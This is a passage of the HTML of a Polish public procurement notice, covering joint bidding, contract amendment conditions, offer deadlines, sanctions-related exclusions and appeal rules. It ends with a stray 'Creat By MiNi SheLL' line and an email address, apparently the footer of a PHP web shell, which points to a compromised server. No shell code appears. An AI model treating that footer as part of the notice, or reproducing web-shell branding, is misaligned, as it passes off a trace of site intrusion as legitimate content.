wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Takie umocowanie może nastąpić na podstawie Pełnomocnictwa lub Umowy spółki cywilnej, które winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w formularzu oferty składają oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić w formie pisemnej przy zachowaniu wymogów z art. 455 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2024 r. poz. 1320), zgodnie ze Specyfikacją Warunków Zamówienia.<br/>2. Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem, że zmiana umowy może nastąpić wyłącznie za zgodą obydwu stron wyrażoną na piśmie pod rygorem nieważności.<br/>3. Postanowienia umowy mogą ulec zmianie w oparciu o art. 455 ust. 1 pkt 1 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych w niżej wymienionych przypadkach:<br/>a) zmiana terminu wykonania przedmiotu umowy ustalonego w § 3 dopuszczalna jest wyłącznie w przypadku:<br/>- przedłużających się prac instytucji i organów, od których konieczne jest uzyskanie decyzji, postanowień, uzgodnień itp., pod warunkiem, że Wykonawca dochował wszelkiej staranności w przygotowaniu wniosku o wydanie takich decyzji, opinii czy uzgodnień,<br/>- niemożności rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonywaniu z przyczyn leżących po stronie Zamawiającego,<br/>- zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,<br/>- zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają,<br/>- konieczności dokonania korekt w zatwierdzonym przez Zamawiającego rozwiązaniu projektowym, a wynikających ze zmiany stanowiska Zamawiającego lub stanowiska instytucji uzgadniających (opiniujących),<br/>- konieczności wykonania dodatkowych prac związanych np. z przekopami próbnymi, odkryciem istniejących obiektów,<br/>- zdarzeń losowych (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, którym nie można zapobiec), które będą miały wpływ na treść zawartej umowy i termin realizacji usługi,<br/>- konieczności dokonania istotnych zmian w dokumentacji projektowo–kosztorysowej na wniosek stron ze względu na okoliczności, które na etapie przystąpienia do prac projektowych nie były możliwe do przewidzenia i określenia,<br/>- opóźnienia otrzymania prawomocnej decyzji o uwarunkowaniach środowiskowych.<br/>Zmiana terminu wykonania przedmiotu umowy nastąpi o czas trwania w/w zdarzeń i/lub okoliczności.<br/>b) zmiana w zakresie przedmiotu umowy dopuszczalna jest wyłącznie w przypadku, gdy zmiana ta stała się konieczna ze względu na interes Zamawiającego, w szczególności z uwagi na zmniejszenie zakresu dokumentacji projektowo-kosztorysowej pierwotnie przeznaczonego do wykonania w ramach umowy, bez odszkodowania dla Wykonawcy oraz z<br/>odpowiednio pomniejszonym wynagrodzeniem, przy zachowaniu tych samych cen jednostkowych i wskaźników.<br/>4. W sytuacjach opisanych w ust. 3 zmiana postanowień umowy wymaga pisemnego wniosku Zamawiającego lub Wykonawcy wraz z uzasadnieniem oraz aneksu podpisanego przez właściwie umocowanych przedstawicieli<br/>Zamawiającego i Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1051878</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-07 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z treścią art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zwanej dalej „ustawą”, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 z dnia 18 maja 2006 r. dotyczącym środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy i rozporządzeniu 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1, pkt III ppkt1-3.<br/>2. Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z.p.<br/><br/>ŚRODKI OCHRONY PRAWNEJ PRZYSŁUGUJĄCE WYKONAWCY<br/><br/>Środki ochrony prawnej przysługują wykonawcy i innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy p.z.p.<br/>Odwołanie przysługuje na:<br/>1) niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienia umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której zamawiający był obowiązany na podstawie ustawy;<br/>Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.<br/>Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub konkurs lub wobec treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w BZP lub dokumentów zamówienia na stronie internetowej, w przypadku zamówień, których wartość jest mniejsza niż progi unijne.<br/>Odwołanie wnosi się w terminie:<br/>1) 5 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej,<br/>2) 10 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w pkt 1).<br/>Odwołanie w przypadkach innych wnosi się w terminie 5 dni od dnia, w którym powzięto lub można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com